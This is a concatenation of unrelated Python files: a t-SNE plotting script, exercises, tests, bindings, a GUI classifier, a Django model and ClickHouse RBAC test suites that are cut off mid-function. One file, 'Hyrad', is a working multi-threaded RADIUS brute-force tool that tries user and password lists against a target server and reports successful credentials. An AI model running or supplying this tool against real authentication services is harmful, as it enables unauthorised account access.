sys.path.append(os.path.abspath(os.path.join(os.getcwd(), os.pardir)))
import matplotlib.pyplot as plt
import numpy as np
from sklearn import preprocessing
from sklearn.manifold import TSNE
from neural_network.Dataset import FullDataset
from neural_network.SNN import initialise_snn
from configuration.Configuration import Configuration
# In progress. For visualization of encoded data of an SNN using T-SNE or PCA.
# Standalone analysis script: encodes the training data with a trained SNN and
# projects it to 2-D with t-SNE for visual inspection of class separation.
if __name__ == '__main__':
    os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'
    # Config relevant for cnnwithclassattention
    use_channelwiseEncoded_for_cnnwithclassattention = True
    use_each_sensor_as_single_example = True  # default: false
    use_channelcontextEncoded_for_cnnwithclassattention = True
    # TSNE Embeddings are learned on a sim matrix, not on embeddings itself
    use_sim_matrix = False  # default false
    encode_test_data = False
    config = Configuration()
    config.architecture_variant = config.architecture_variants[0]
    if config.case_base_for_inference:
        dataset = FullDataset(config.case_base_folder, config, training=False)
    else:
        dataset = FullDataset(config.training_data_folder, config, training=False)
        # config.case_base_folder
    dataset.load()
    # Spot-check a few training labels by index.
    print("130:", dataset.y_train_strings[130])
    print("200:", dataset.y_train_strings[200])
    print("700:", dataset.y_train_strings[700])
    print("750:", dataset.y_train_strings[750])
    print("650:", dataset.y_train_strings[650])
    print("550:", dataset.y_train_strings[550])
    print("790:", dataset.y_train_strings[790])
    print("730:", dataset.y_train_strings[730])
    architecture = initialise_snn(config, dataset, False)
    if architecture.hyper.encoder_variant in ['cnnwithclassattention', 'cnn1dwithclassattention']:
        if config.use_same_feature_weights_for_unsimilar_pairs == True:
            print("config.use_same_feature_weights_for_unsimilar_pairs should be False during TSNE Plot!")
    # As TSNE Input either a distance matrix or
    if use_sim_matrix == True:
        sim_matrix = dataset.get_similarity_matrix(architecture, encode_test_data=encode_test_data)
        distance_matrix = 1 - sim_matrix
    else:
        encoded_data = dataset.encode(architecture, encode_test_data=encode_test_data)
    if architecture.hyper.encoder_variant in ['cnnwithclassattention', 'cnn1dwithclassattention']:
        x_train_encoded = dataset.x_train[0]
        x_train_encoded_context = np.squeeze(dataset.x_train[2])
        x_train_labels = dataset.y_train_strings
        x_test_labels = dataset.y_test_strings
    else:
        # Loading encoded data previously created by the DatasetEncoder.py
        x_train_encoded = dataset.x_train
        x_test_encoded = dataset.x_test
        x_train_labels = dataset.y_train_strings
        x_test_labels = dataset.y_test_strings
    if encode_test_data:
        print("Loaded encoded data: ", x_train_encoded.shape, " ", x_test_encoded.shape)
    else:
        print("Loaded encoded data: ", x_train_encoded.shape)
    # Encoding / renaming of labels from string value (e.g. no error, ....) to integer (e.g. 0)
    le = preprocessing.LabelEncoder()
    if use_each_sensor_as_single_example:
        # Generate new labels
        x_test_train_labels = np.tile(dataset.feature_names_all, x_train_encoded.shape[0])
        le.fit(dataset.feature_names_all)
        numOfClasses = le.classes_.size
        unique_labels_EncodedAsNumber = le.transform(le.classes_)  # each label encoded as number
        x_trainTest_labels_EncodedAsNumber = le.transform(x_test_train_labels)
    else:
        x_test_train_labels = np.concatenate((x_train_labels, x_test_labels),
                                             axis=0)
        le.fit(x_test_train_labels)
        numOfClasses = le.classes_.size
        # print("Number of classes detected: ", numOfClasses, ". \nAll classes: ", le.classes_)
        unique_labels_EncodedAsNumber = le.transform(le.classes_)  # each label encoded as number
        x_trainTest_labels_EncodedAsNumber = le.transform(x_train_labels)
    # Converting / reshaping 3d encoded features to 2d (required as TSNE/PCA input)
    data4TSNE = None
    if architecture.hyper.encoder_variant in ['cnnwithclassattention', 'cnn1dwithclassattention']:
        if use_sim_matrix == False:
            # Pick the flattened feature width depending on which encodings are combined.
            if use_channelwiseEncoded_for_cnnwithclassattention:
                num_of_flatten_features = x_train_encoded.shape[1] * x_train_encoded.shape[2]
            if use_channelcontextEncoded_for_cnnwithclassattention:
                num_of_flatten_features = x_train_encoded_context.shape[1]
            if use_channelcontextEncoded_for_cnnwithclassattention & use_channelwiseEncoded_for_cnnwithclassattention:
                num_of_flatten_features = x_train_encoded.shape[1] * x_train_encoded.shape[2] + \
                                          x_train_encoded_context.shape[1]
            if use_each_sensor_as_single_example:
                data4TSNE = np.zeros((x_train_encoded.shape[0] * x_train_encoded.shape[2], x_train_encoded.shape[1]))
            else:
                data4TSNE = np.zeros((x_train_encoded.shape[0], num_of_flatten_features))
            for i in range(x_train_encoded.shape[0]):
                if use_channelwiseEncoded_for_cnnwithclassattention:
                    x = np.reshape(x_train_encoded[i, :, :], (x_train_encoded.shape[1] * x_train_encoded.shape[2]), 1)
                    # print("x: ", x.shape)
                if use_channelcontextEncoded_for_cnnwithclassattention:
                    y = np.squeeze(np.reshape(x_train_encoded_context[i, :], x_train_encoded_context.shape[1]))
                    # print("x_train_encoded[2][i]: ", x_train_encoded_context[2][i].shape)
                if use_channelcontextEncoded_for_cnnwithclassattention & use_channelwiseEncoded_for_cnnwithclassattention:
                    x = np.concatenate((x, y))
                elif use_channelcontextEncoded_for_cnnwithclassattention:
                    x = y
                # print("x: ", x.shape)
                if use_each_sensor_as_single_example:
                    # NOTE(review): the hard-coded 61 and the (i - 1) offset look suspicious
                    # (row 0 would index negatively) -- verify against the dataset layout.
                    for s in range(x_train_encoded.shape[2]):
                        x = np.reshape(x_train_encoded[i, :, s], (x_train_encoded.shape[1]), 1)
                        data4TSNE[((i - 1) * 61 + s), :] = x
                else:
                    data4TSNE[i, :] = x
        else:
            data4TSNE = distance_matrix
        print("data4TSNE:", data4TSNE.shape)
    else:
        num_of_flatten_features = x_train_encoded.shape[1] * x_train_encoded.shape[2]
        data4TSNE = np.zeros((x_train_encoded.shape[0], num_of_flatten_features))
        for i in range(x_train_encoded.shape[0]):
            x = np.reshape(x_train_encoded[i, :, :], (x_train_encoded.shape[1] * x_train_encoded.shape[2]), 1)
            data4TSNE[i, :] = x
    '''
    x_train_encoded_reshapedAs2d = x_train_encoded.reshape(
        [x_train_encoded.shape[0], x_train_encoded.shape[1] * x_train_encoded.shape[2]])
    x_test_encoded_reshapedAs2d = x_test_encoded.reshape(
        [x_test_encoded.shape[0], x_test_encoded.shape[1] * x_test_encoded.shape[2]])
    print("Reshaped encoded data shape train: ", x_train_encoded_reshapedAs2d.shape, ", test: ",
          x_test_encoded_reshapedAs2d.shape)
    '''
    # Concatenate train and test data into one matrix
    # x_testTrain_encoded_reshapedAs2d = np.concatenate((x_train_encoded_reshapedAs2d, x_test_encoded_reshapedAs2d),
    #                                                   axis=0)
    # Reducing dimensionality with TSNE or PCA
    # metrics: manhattan, euclidean, cosine
    if architecture.hyper.encoder_variant in ['cnnwithclassattention', 'cnn1dwithclassattention']:
        if use_sim_matrix:
            X_embedded = TSNE(n_components=2, perplexity=50.0, learning_rate=10, early_exaggeration=30, n_iter=10000,
                              random_state=123, metric="precomputed").fit_transform(data4TSNE)
        else:
            X_embedded = TSNE(n_components=2, perplexity=50.0, learning_rate=10, early_exaggeration=30, n_iter=10000,
                              random_state=123, metric='manhattan').fit_transform(data4TSNE)
    else:
        X_embedded = TSNE(n_components=2, perplexity=50.0, learning_rate=10, early_exaggeration=10, n_iter=10000,
                          random_state=123, metric='manhattan').fit_transform(data4TSNE)
    # X_embedded = TSNE(n_components=2, random_state=123).fit_transform(data4TSNE)
    # X_embedded = PCA(n_components=2, random_state=123).fit_transform(data4TSNE)
    # dt_string = datetime.now().strftime("%m-%d_%H-%M-%S")
    # file_name = '../data/visualizations/' + "reducedTestFeaturesViz.npy"
    # np.save(file_name, X_embedded)
    # X_embedded = np.load(file_name).astype('float32')
    print("X_embedded shape: ", X_embedded.shape)
    # print("X_embedded:", X_embedded[0:10,:])
    # Defining the color for each class
    colors = [plt.cm.jet(float(i) / max(unique_labels_EncodedAsNumber)) for i in range(numOfClasses)]
    # Color maps: https://matplotlib.org/examples/color/colormaps_reference.html
    # colors_ = colors(np.array(unique_labels_EncodedAsNumber))
    # Overriding color map with own colors
    colors[0] = np.array([0 / 256, 128 / 256, 0 / 256, 1])  # no failure
    '''
    colors[0] = np.array([0 / 256, 128 / 256, 0 / 256, 1])  # no failure
    colors[1] = np.array([65 / 256, 105 / 256, 225 / 256, 1])  # txt15_m1_t1_high_wear
    colors[2] = np.array([135 / 256, 206 / 256, 250 / 256, 1])  # txt15_m1_t1_low_wear
    colors[3] = np.array([123 / 256, 104 / 256, 238 / 256, 1])  # txt15_m1_t2_wear
    colors[4] = np.array([189 / 256, 183 / 256, 107 / 256, 1])  # txt16_i4
    colors[5] = np.array([218 / 256, 112 / 256, 214 / 256, 1])  # txt16_m3_t1_high_wear
    colors[6] = np.array([216 / 256, 191 / 256, 216 / 256, 1])  # txt16_m3_t1_low_wear
    colors[7] = np.array([128 / 256, 0 / 256, 128 / 256, 1])  # txt16_m3_t2_wear
    colors[8] = np.array([255 / 256, 127 / 256, 80 / 256, 1])  # txt_17_comp_leak
    colors[9] = np.array([255 / 256, 99 / 256, 71 / 256, 1])  # txt_18_comp_leak
    '''
    # Generating the plot
    rowCounter = 0
    for i, u in enumerate(unique_labels_EncodedAsNumber):
        # print("i: ",i,"u: ",u)
        for j in range(X_embedded.shape[0]):
            if x_trainTest_labels_EncodedAsNumber[j] == u:
                xi = X_embedded[j, 0]
                yi = X_embedded[j, 1]
                # print("i: ", i, " u:", u, "j:",j,"xi: ", xi, "yi: ", yi)
                plt.scatter(xi, yi, color=colors[i], label=unique_labels_EncodedAsNumber[i], marker='.')
    # print("X_embedded:", X_embedded.shape)
    # print(X_embedded)
    # print("x_trainTest_labels_EncodedAsNumber: ", x_trainTest_labels_EncodedAsNumber)
    plt.title("Visualization Train(.) and Test (x) data (T-SNE-Reduced)")
    lgd = plt.legend(labels=le.classes_, loc='upper center', bbox_to_anchor=(0.5, -0.05),
                     fancybox=True, shadow=True, ncol=3)
    # plt.legend(labels=x_test_train_labels, bbox_to_anchor=(1.05, 1), loc=2, borderaxespad=0.)
    # lgd = plt.legend(labels=le.classes_)
    for i, u in enumerate(le.classes_):
        lgd.legendHandles[i].set_color(colors[i])
        lgd.legendHandles[i].set_label(le.classes_[i])
    # plt.show()
    plt.savefig(architecture.hyper.encoder_variant + '_' + config.filename_model_to_use + '_730.png',
                bbox_extra_artists=(lgd,), bbox_inches='tight')
|
#!/usr/bin/env python
import argparse
import binascii
import hashlib
import re
import select
import socket
import sys
import textwrap
from multiprocessing.dummy import Pool
'''
TODO
- generate random AUTHENTICATOR
- fuzzing?
'''
class bcolors:
    """ANSI escape sequences for coloured terminal output."""
    HEADER = '\033[95m'
    OKBLUE = '\033[94m'
    OKGREEN = '\033[92m'
    WARNING = '\033[93m'
    FAIL = '\033[91m'
    ENDC = '\033[0m'  # reset all attributes
    BOLD = '\033[1m'
    UNDERLINE = '\033[4m'
# convert num to hex, i.e. 1 => \x01, 10 => \x0A etc.
# least_num_of_byte controls whether padding would be done. e.g. num =1, least_num_of_byte = 2 => \x00\x01
def int_to_hex(num, least_num_of_byte = 1):
    """Pack *num* into its big-endian byte string.

    least_num_of_byte controls zero-padding, e.g. num=1, least_num_of_byte=2
    gives '\\x00\\x01'.  Uses binascii.unhexlify instead of the Python-2-only
    str.decode("hex"): identical output under Python 2 (str) and also valid
    under Python 3 (bytes).
    """
    # "{0:#0{1}x}" renders e.g. 1 -> "0x01"; strip the "0x" prefix, then unhexlify.
    hex_length = 2*least_num_of_byte + 2
    return binascii.unhexlify("{0:#0{1}x}".format(num, hex_length)[2:])
# encrypting the password based on https://tools.ietf.org/html/rfc2865#page-27
def enc_pass(shared_key, authenticator, password):
    """RFC 2865 User-Password obfuscation (Python 2 only: hex codec, str bytes).

    The password is split into 16-byte chunks; chunk 1 is XORed with
    MD5(shared_key + authenticator), every following chunk with
    MD5(shared_key + previous ciphertext chunk).
    """
    CHUNK_SIZE = 16
    # Split the password into 16-byte chunks.
    pass_ary = [password[i:i+CHUNK_SIZE] for i in range(0, len(password), CHUNK_SIZE)]
    final = ""
    for chunk in pass_ary:
        if len(chunk) < CHUNK_SIZE:
            # Null-pad the last chunk to a full 16 bytes via a hex round-trip.
            chunk = (chunk.encode("hex") + "00" * (CHUNK_SIZE - len(chunk))).decode("hex")
        md5 = hashlib.md5()
        try:
            # NameError probe: `xor` only exists after the first iteration.
            xor
            # subsequent run, chunk n xor MD5(shared key + chunk n-1)
            md5.update(shared_key + xor)
        except NameError:
            # first run, chunk1 xor MD5(shared key + authenticator)
            md5.update(shared_key + authenticator)
        IV = md5.hexdigest()
        xor = "".join(chr(ord(x) ^ ord(y)) for x, y in zip(chunk, IV.decode("hex")))
        final += xor
    return final
def brute(user):
    """Try every candidate password (module-global ``allpasses``) for *user*
    against the target RADIUS server.  Python 2 only.

    NOTE(review): ``socket`` here is the module-level UDP socket *object* that
    shadows the ``socket`` module (rebound near the bottom of the file).
    """
    RADIUS_CODE = "\x01" # access-request - https://en.wikipedia.org/wiki/RADIUS#Packet_structure
    # Fixed (non-random) request authenticator; see the TODO at the top of the file.
    AUTHENTICATOR = "\x20\x20\x20\x20\x20\x20\x31\x34\x38\x35\x33\x37\x35\x35\x36\x33"
    for idx, pwd in enumerate(allpasses):
        pack_id = int_to_hex(idx%256)  # RADIUS packet identifier is a single byte
        # generate password related fields
        AVP_PWD_TYPE = "\x02"
        encrypted = enc_pass(args.secret, AUTHENTICATOR, pwd)
        avp_pwd_len = len(encrypted) + len(AVP_PWD_TYPE) + 1 # reserve 1B for the length field itself
        avp_pwd_len_hex = int_to_hex(avp_pwd_len%256) # 256 = 2^8 = 1 byte available for length
        # generate user related fields
        AVP_UNAME_TYPE = "\x01"
        avp_uname_len = len(user) + len(AVP_UNAME_TYPE) + 1 # reserve 1B for the length field itself
        avp_uname_len_hex = int_to_hex(avp_uname_len%256) # 256 = 2^8 = 1 byte available for length
        pkt_len = avp_pwd_len + avp_uname_len + len(AUTHENTICATOR) + len(pack_id) + len(RADIUS_CODE) + 2 # reserve 2B for the length field itself
        pkt_len_hex = int_to_hex(pkt_len%65536, 2) # 65536 = 2^16 = 2 bytes available for length
        # send it
        socket.sendto(RADIUS_CODE + pack_id + pkt_len_hex + AUTHENTICATOR + AVP_UNAME_TYPE + avp_uname_len_hex + user + AVP_PWD_TYPE + avp_pwd_len_hex + encrypted, (args.ip, int(args.port)))
        # Wait up to 5s for a reply on the shared non-blocking socket.
        ready = select.select([socket], [], [], 5)
        if ready[0]:
            resp_hex = socket.recv(2048).encode("hex")
            print resp_hex
            resp_code = resp_hex[:2]
            # RADIUS response code 2 == Access-Accept.
            if resp_code == "02":
                print "success with secret: %s and password: %s" % (args.secret, pwd)
        else:
            print "Timeout"
# parse arguments
parser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter,
                                 description=textwrap.dedent('''\
                                 %sHyrad - v0.3
                                 An utility tool to brute force authentication service using Radius protocol.%s
                                 ''' % (bcolors.OKGREEN, bcolors.ENDC)))
parser.add_argument('ip', metavar="IP", help="Required. The IP address where the radius service is running")
parser.add_argument('-P', '--port', dest="port", help="The port of the radius service. Default 1812", default=1812)
parser.add_argument('-u', '--username', dest="user", help="The username to be used.")
parser.add_argument('--userlist', dest="userlist", help="The list of users to be used.")
parser.add_argument('-p', '--password', dest="password", help="The password to be used.")
parser.add_argument('--passlist', dest="passlist", help="The list of passwords to be tried.")
parser.add_argument('-s', '--secret', dest="secret", help="Required. The shared secret to be used", required=True)
parser.add_argument('-t', '--thread', dest="thread", help="The number of threads to be used. Default 4", default=4)
args = parser.parse_args()
# get the final list of users to try
allusers = []
if args.userlist is not None:
    with open(args.userlist) as f:
        allusers = f.readlines()
if args.user is not None:
    allusers += [args.user]
if len(allusers) == 0:
    print "\n\n%sNo user was provided. Quitting%s\n\n"%(bcolors.FAIL, bcolors.ENDC)
    parser.print_help()
    sys.exit(2)
# rid of new lines etc
allusers = [x.strip() for x in allusers]
# get the final list of passwords
allpasses = []
if args.passlist is not None:
    with open(args.passlist) as f:
        allpasses += f.readlines()
if args.password is not None:
    allpasses += [args.password]
if len(allpasses) == 0:
    print "\n\n%sNo password was provided. Quitting%s\n\n"%(bcolors.FAIL, bcolors.ENDC)
    parser.print_help()
    sys.exit(2)
allpasses = [x.strip() for x in allpasses]
# prepare socket
# NOTE(review): this rebinding shadows the `socket` module with a socket
# instance; brute() depends on it (socket.sendto / socket.recv).
socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
socket.setblocking(0)
# One dummy-pool (thread) worker per user, all sharing the single UDP socket.
pool = Pool(int(args.thread))
pool.map(brute, allusers)
pool.close()
pool.join()
|
'''
Your function should take in a single parameter (a string `word`)
Your function should return a count of how many occurences of ***"th"*** occur within `word`. Case matters.
Your function must utilize recursion. It cannot contain any loops.
'''
def count_th(word):
    """Recursively count case-sensitive occurrences of "th" in *word*.

    No loops: the string is consumed one character per recursive call.
    """
    # Base case: fewer than two characters left -- no match possible.
    if len(word) < 2:
        return 0
    # Count a match at the front (if any), then recurse past one character.
    here = 1 if word.startswith('th') else 0
    return here + count_th(word[1:])
|
from projects.golem_api.pages import auth
def test_get_token(data):
    """A valid admin login returns 200 and a bare token string as the JSON body."""
    response = auth.get_token_request(data.env.users.admin.username, data.env.users.admin.password)
    assert response.status_code == 200
    assert type(response.json()) is str
def test_get_token_with_incorrect_password(data):
    """A wrong password for a known user is rejected with 401."""
    response = auth.get_token_request(data.env.users.admin.username, 'incorrect_password')
    assert response.status_code == 401
def test_get_token_with_unknown_user(data):
    """An unknown username is rejected with 401 regardless of password."""
    response = auth.get_token_request('unknown_user_01', 'does not matter')
    assert response.status_code == 401
|
"""
libspecinfra-python
----
Python bindings for libspecinfra
"""
__version__ = '0.0.1'
import sys
import ctypes
import os
import libspecinfra.resource
from libspecinfra.structures import SpecinfraS, BackendWrapperS
# Module-level cache for the loaded native library handle.
library = None
def load():
    """Load (once) and return the native libspecinfra shared library.

    The library file is expected next to this module, named per platform:
    libspecinfra.so / libspecinfra.dylib / specinfra.dll.
    """
    global library
    if library is not None:
        return library
    libdir = os.path.dirname(os.path.abspath(__file__))
    if sys.platform == 'win32':
        prefix, extension = '', '.dll'
    elif sys.platform == 'darwin':
        prefix, extension = 'lib', '.dylib'
    else:
        prefix, extension = 'lib', '.so'
    library = ctypes.cdll.LoadLibrary(os.path.join(libdir, prefix + 'specinfra' + extension))
    return library
class Specinfra(object):
    """Thin ctypes wrapper around a native `specinfra` handle.

    Usable as a context manager; the native handle is freed on exit.
    """
    def __init__(self, direct):
        lib = load()
        # Declare argument/return types once so ctypes marshals pointers correctly.
        lib.specinfra_new.argtypes = (ctypes.POINTER(BackendWrapperS),)
        lib.specinfra_new.restype = ctypes.POINTER(SpecinfraS)
        lib.specinfra_free.argtypes = (ctypes.POINTER(SpecinfraS),)
        self.lib = lib
        self.obj = lib.specinfra_new(direct.obj)
    def __enter__(self):
        # Bug fix: __exit__ existed without __enter__, so `with Specinfra(...)`
        # raised AttributeError before this method was added.
        return self
    def __exit__(self, exc_type, exc_value, traceback):
        # Release the native handle regardless of whether an exception occurred.
        self.lib.specinfra_free(self.obj)
    def file(self, path):
        """Return a File resource bound to this native handle."""
        return libspecinfra.resource.File(self.obj, path)
|
import numpy as np
from tkinter import *
from tkinter.filedialog import askopenfilename
import cv2
import consts
from keras.models import load_model
from data import Data
from PIL import Image, ImageTk
# Load the trained classifier once at startup (blocking file read).
model = load_model('trashnet.h5')
root = Tk()
# Shared UI state: the chosen image path and the prediction message.
PATH = StringVar()
CATIGORY = StringVar()
def browsefunc():
    """Ask the user for an image file, remember its path and show a preview."""
    PATH.set(askopenfilename())
    img = ImageTk.PhotoImage(Image.open(PATH.get()))
    panel.configure(image=img)
    # Keep a reference on the widget so the PhotoImage is not garbage-collected.
    panel.image = img
def predict():
    """Classify the currently selected image and display its category.

    Bug fix: ``StringVar.get()`` returns a string (possibly empty), never
    ``None``, so the old ``is not None`` check always passed and clicking
    "predict" with no image selected crashed inside preprocessing.  Testing
    truthiness skips the empty-path case.
    """
    if PATH.get():
        input = Data.make_read_for_input(PATH.get())
        prediction = Data.FromOneHot(model.predict(input))[0]
        CATIGORY.set('prediction is : ' + consts.CAT[prediction])
# Static layout: preview image on top, then the two buttons, then the result label.
panel = Label(root)
panel.grid(row = 0,column = 0)
browsebutton = Button(root, text="choose a image", command=browsefunc)
browsebutton.grid(row = 1,column=0)
predictbutton = Button(root, text="predict the image", command=predict)
predictbutton.grid(row = 2,column=0)
prediction = Label(root, textvariable=CATIGORY)
prediction.grid(row = 3,column=0)
# Enter the Tk event loop (blocks until the window is closed).
mainloop()
class ParsingError(Exception):
    """Signals that the parser encountered an invalid token."""
    def __init__(self, token):
        # Token that triggered the failure; must expose ``lineNumber``.
        self.errorToken = token
    def __str__(self):
        line_no = self.errorToken.lineNumber
        return "Parsing error at line {}".format(line_no)
    @classmethod
    def raises(cls, tok):
        """Construct and immediately raise the error for ``tok``."""
        raise cls(tok)
|
# -*- coding: utf8 -*
from django.db import models
class FileDescriptor(models.Model):
    """Metadata record for an uploaded file."""
    # Display name (not necessarily the stored filename).
    name = models.CharField(max_length=255)
    # Uploaded file, stored under a date-based directory (YYYY/MM/DD).
    path = models.FileField(upload_to='%Y/%m/%d')
    description = models.CharField(max_length=255, blank=True, null=True)
    tag = models.CharField(max_length=255, blank=True, null=True)
    # Short type marker -- presumably a MIME type or category; TODO confirm against callers.
    type = models.CharField(max_length=30, blank=True, null=True)
    # Path/URL of a generated thumbnail, if any.
    thumbnail = models.CharField(max_length=255, blank=True, null=True)
|
import os, sys, math
import ply.lex as lex
import ply.yacc as yacc
# Token names for the ply lexer; each needs a matching t_<NAME> rule elsewhere.
tokens = [ # List of token names
    'INT',
    'FLOAT',
    'NAME',
    'PLUS',
    'MINUS',
    'DIVIDE',
    'MULTIPLY',
    'EQUALS',
    'R_PARENTHESIS',
    'L_PARENTHESIS',
    'DELIMITER'
]
# Single-character tokens handled literally by ply.
literals = [ '{', '}' ]
|
import numpy as np
import cv2
import cv
from Gen import Gen
class Osc(Gen):
    """Base oscillator generator with frequency/phase/sync attributes."""
    def __init__(self, name):
        Gen.__init__(self, name)
        # Default oscillator parameters; subclasses may add more (e.g. 'width').
        self.attrs['freq'] = 220.0
        self.attrs['phase'] = 0.0
        self.attrs['sync'] = 2.0
    def update_attrs(self, updates = None):
        """Copy known keys from ``updates`` into ``self.attrs``.

        Unknown keys are silently ignored.  The default was changed from the
        mutable ``{}`` to ``None`` (mutable-default pitfall); caller-visible
        behaviour is unchanged.
        """
        if updates is None:
            updates = {}
        for attr_type in updates:
            if attr_type in self.attrs:
                self.attrs[attr_type] = updates[attr_type]
class Phasor(Osc):
    """Oscillator variant; the generator name is the class name."""
    def __init__(self):
        Osc.__init__(self, self.__class__.__name__)
class SinOsc(Osc):
    """Sine oscillator variant; uses only the base Osc attributes."""
    def __init__(self):
        Osc.__init__(self, self.__class__.__name__)
class PulsOsc(Osc):
    """Pulse oscillator; adds a 'width' attribute (default 0.5)."""
    def __init__(self):
        Osc.__init__(self, self.__class__.__name__)
        # Presumably the pulse duty cycle -- confirm against the Gen consumers.
        self.attrs['width'] = 0.5
class SqrOsc(Osc):
    """Square oscillator; adds a 'width' attribute (default 0.5)."""
    def __init__(self):
        Osc.__init__(self, self.__class__.__name__)
        self.attrs['width'] = 0.5
class TriOsc(Osc):
    """Triangle oscillator; adds a 'width' attribute (default 0.5)."""
    def __init__(self):
        Osc.__init__(self, self.__class__.__name__)
        self.attrs['width'] = 0.5
class SawOsc(Osc):
    """Sawtooth oscillator; adds a 'width' attribute (default 1.0)."""
    def __init__(self):
        Osc.__init__(self, self.__class__.__name__)
        self.attrs['width'] = 1.0
|
"""
A permutation of an array of integers is an arrangement of its members into a sequence or linear order.
For example, for arr = [1,2,3], the following are considered permutations of arr: [1,2,3], [1,3,2], [3,1,2], [2,3,1].
The next permutation of an array of integers is the next lexicographically greater permutation of its integer. More formally, if all the permutations of the array are sorted in one container according to their lexicographical order, then the next permutation of that array is the permutation that follows it in the sorted container. If such arrangement is not possible, the array must be rearranged as the lowest possible order (i.e., sorted in ascending order).
For example, the next permutation of arr = [1,2,3] is [1,3,2].
Similarly, the next permutation of arr = [2,3,1] is [3,1,2].
While the next permutation of arr = [3,2,1] is [1,2,3] because [3,2,1] does not have a lexicographical larger rearrangement.
Given an array of integers nums, find the next permutation of nums.
The replacement must be in place and use only constant extra memory.
Example 1:
Input: nums = [1,2,3]
Output: [1,3,2]
Example 2:
Input: nums = [3,2,1]
Output: [1,2,3]
Example 3:
Input: nums = [1,1,5]
Output: [1,5,1]
Constraints:
1 <= nums.length <= 100
0 <= nums[i] <= 100
"""
from typing import List
class NextPermutation:
    def nextPermutation(self, nums: List[int]) -> None:
        """
        Do not return anything, modify nums in-place instead.

        Standard algorithm: find the rightmost ascent, swap its left element
        with the smallest strictly-larger element to its right, then reverse
        the (descending) suffix.
        """
        # Scan right-to-left for the first position with nums[pivot-1] < nums[pivot].
        pivot = len(nums) - 1
        while pivot > 0 and nums[pivot - 1] >= nums[pivot]:
            pivot -= 1
        if pivot == 0:
            # Whole array is non-increasing: wrap around to the smallest order.
            nums.reverse()
            return
        left = pivot - 1
        # Rightmost element strictly greater than nums[left]; exists by choice of pivot.
        right = len(nums) - 1
        while nums[right] <= nums[left]:
            right -= 1
        nums[left], nums[right] = nums[right], nums[left]
        # Reverse the suffix to make it ascending.
        nums[pivot:] = reversed(nums[pivot:])
|
from testflows.core import *
from testflows.asserts import error
from rbac.requirements import *
from rbac.helper.common import *
import rbac.helper.errors as errors
@TestSuite
def describe_with_privilege_granted_directly(self, node=None):
    """Check that user is able to execute DESCRIBE on a table if and only if
    they have SHOW COLUMNS privilege for that table granted directly.
    """
    user_name = f"user_{getuid()}"
    if node is None:
        node = self.context.node
    # Run the shared `describe` checks with the privilege granted to the user itself.
    with user(node, f"{user_name}"):
        table_name = f"table_name_{getuid()}"
        Suite(test=describe)(grant_target_name=user_name, user_name=user_name, table_name=table_name)
@TestSuite
def describe_with_privilege_granted_via_role(self, node=None):
    """Check that user is able to execute DESCRIBE on a table if and only if
    they have SHOW COLUMNS privilege for that table granted through a role.
    """
    user_name = f"user_{getuid()}"
    role_name = f"role_{getuid()}"
    if node is None:
        node = self.context.node
    # Same checks as the direct-grant suite, but privileges target the role.
    with user(node, f"{user_name}"), role(node, f"{role_name}"):
        table_name = f"table_name_{getuid()}"
        with When("I grant the role to the user"):
            node.query(f"GRANT {role_name} TO {user_name}")
        Suite(test=describe)(grant_target_name=role_name, user_name=user_name, table_name=table_name)
@TestSuite
@Requirements(
    RQ_SRS_006_RBAC_DescribeTable_RequiredPrivilege("1.0"),
)
def describe(self, grant_target_name, user_name, table_name, node=None):
    """Check that user is able to execute DESCRIBE only when they have SHOW COLUMNS privilege.

    grant_target_name -- entity (user or role) that privileges are granted to
    user_name -- user executing the DESCRIBE statements
    table_name -- table under test (created by the `table` context manager)
    """
    exitcode, message = errors.not_enough_privileges(name=user_name)
    if node is None:
        node = self.context.node
    with table(node, table_name):
        with Scenario("DESCRIBE table without privilege"):
            with When("I grant the user NONE privilege"):
                node.query(f"GRANT NONE TO {grant_target_name}")
            with And("I grant the user USAGE privilege"):
                node.query(f"GRANT USAGE ON *.* TO {grant_target_name}")
            with Then(f"I attempt to DESCRIBE {table_name}"):
                node.query(f"DESCRIBE {table_name}", settings=[("user",user_name)],
                    exitcode=exitcode, message=message)
        with Scenario("DESCRIBE with privilege"):
            with When(f"I grant SHOW COLUMNS on the table"):
                node.query(f"GRANT SHOW COLUMNS ON {table_name} TO {grant_target_name}")
            with Then(f"I attempt to DESCRIBE {table_name}"):
                node.query(f"DESCRIBE TABLE {table_name}", settings=[("user",user_name)])
        with Scenario("DESCRIBE with revoked privilege"):
            with When(f"I grant SHOW COLUMNS on the table"):
                node.query(f"GRANT SHOW COLUMNS ON {table_name} TO {grant_target_name}")
            with And(f"I revoke SHOW COLUMNS on the table"):
                node.query(f"REVOKE SHOW COLUMNS ON {table_name} FROM {grant_target_name}")
            with Then(f"I attempt to DESCRIBE {table_name}"):
                node.query(f"DESCRIBE {table_name}", settings=[("user",user_name)],
                    exitcode=exitcode, message=message)
        with Scenario("DESCRIBE with revoked ALL privilege"):
            with When(f"I grant SHOW COLUMNS on the table"):
                node.query(f"GRANT SHOW COLUMNS ON {table_name} TO {grant_target_name}")
            with And("I revoke ALL privilege"):
                node.query(f"REVOKE ALL ON *.* FROM {grant_target_name}")
            with Then(f"I attempt to DESCRIBE {table_name}"):
                node.query(f"DESCRIBE {table_name}", settings=[("user",user_name)],
                    exitcode=exitcode, message=message)
        with Scenario("DESCRIBE with ALL privilege"):
            # NOTE(review): step description says SHOW COLUMNS but the query grants ALL.
            with When(f"I grant SHOW COLUMNS on the table"):
                node.query(f"GRANT ALL ON *.* TO {grant_target_name}")
            with Then(f"I attempt to DESCRIBE {table_name}"):
                node.query(f"DESCRIBE TABLE {table_name}", settings=[("user",user_name)])
@TestSuite
def show_create_with_privilege_granted_directly(self, node=None):
    """Check that user is able to execute SHOW CREATE on a table if and only if
    they have SHOW COLUMNS privilege for that table granted directly.
    """
    user_name = f"user_{getuid()}"
    if node is None:
        node = self.context.node
    # Run the shared `show_create` checks with the privilege granted to the user itself.
    with user(node, f"{user_name}"):
        table_name = f"table_name_{getuid()}"
        Suite(test=show_create)(grant_target_name=user_name, user_name=user_name, table_name=table_name)
@TestSuite
def show_create_with_privilege_granted_via_role(self, node=None):
    """Check that user is able to execute SHOW CREATE on a table if and only if
    they have SHOW COLUMNS privilege for that table granted through a role.
    """
    user_name = f"user_{getuid()}"
    role_name = f"role_{getuid()}"
    if node is None:
        node = self.context.node
    # Same checks as the direct-grant suite, but privileges target the role.
    with user(node, f"{user_name}"), role(node, f"{role_name}"):
